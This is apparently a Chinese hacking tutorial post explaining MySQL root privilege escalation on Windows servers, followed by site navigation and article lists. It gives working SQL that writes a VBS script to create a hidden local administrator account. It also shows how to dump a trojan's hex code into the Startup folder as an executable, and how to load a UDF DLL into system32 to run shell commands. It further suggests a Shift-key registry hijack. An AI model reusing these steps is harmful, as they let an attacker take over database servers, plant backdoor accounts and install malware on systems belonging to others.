MYSQL提权我在前面已经写的很明白了,但是还有一些朋友ROOT连接上了,但是无法执行CMD。无论执行什么都返回:
数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't open shared library 'udf.dll' (errno: 0 )
////////////////////////////////////
那么我们在利用服务器组件来进行VBS提权:
///////////////////
构造语句:
/////////////////
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user foolishqiang foolishqiang /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators foolishqiang /add"",0) " );
///////////////////////
后面我加了一个参数:0,意思为默默的执行。没有任何回显。0表示不弹出CMD窗口,安静的运行。
////////////////////////////////////
上面的方法一般在加上我以前写的一个MYSQL提权应该能解决提权的问题了。我们也可以以16进制写exe文件
///////////////////////////
create table a (cmd BLOB);
insert into a values (CONVERT(木马的16进制代码,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\foolishqiang.exe'
注意:路径一定要写\\ 俩个 因为要过滤一个\
///////////////////////////////////////////////
应该说root的总结的差不多了 包括了dll提权。已经导vbs提权。exe提权,Linx Mysql BackDoor提权等。
如果还要深入的话。干点root
还有MIX.DLL。
create table temp_mix(abc longblob);
insert into temp_mix values(load_file('D:\\\udf.dll')); ///////////路径
select * from temp_mix into dumpfile 'C:\\Windows\\system32\\udf.dll';
create function MyCmd returns string soname 'udf.dll';
select MyCmd('net user');
drop table if exists temp_mix;
这个一般用的不是很多。
/////////////////
我们也可以构造语句,来劫持注册表shift。而不去替换(有保护)。这样也可以进行提权。
Root的提权方法我基本已经都说了。
小菜愚见,大牛不要见笑
相关视频
相关阅读 Mac OS X 系统上如何升级 Mysql 数据库?mysql数据库root密码忘记的修改方法mysql启动错误1067简单解决办法彻底解决mysql中文乱码的办法Dos远程登录mysql数据库详细图文教程mysql怎么开启远程登录功能mysql自动定时备份数据库的最佳方法-支持windows系统mysql数据库损坏快速修复方法
热门文章 没有查询到任何记录。
最新文章
没有查询到任何记录。
Oracle如何提高SQL执行效率Oracle统计信息与子分区为什么对数据库要加DISTINCTOracle SQL 常见问题方案(一)
人气排行 SQL水晶报表存储过程为什么对数据库要加DISTINCTOracle如何提高SQL执行效率MySQL从后门进企业市场常见数据库系统之比较 - Oracle数据库常见数据库系统之比较 - SYBASE 和 SQL SER用wu-ftpd架设FTP服务器常见数据库系统之比较 - DB2数据库
查看所有0条评论>>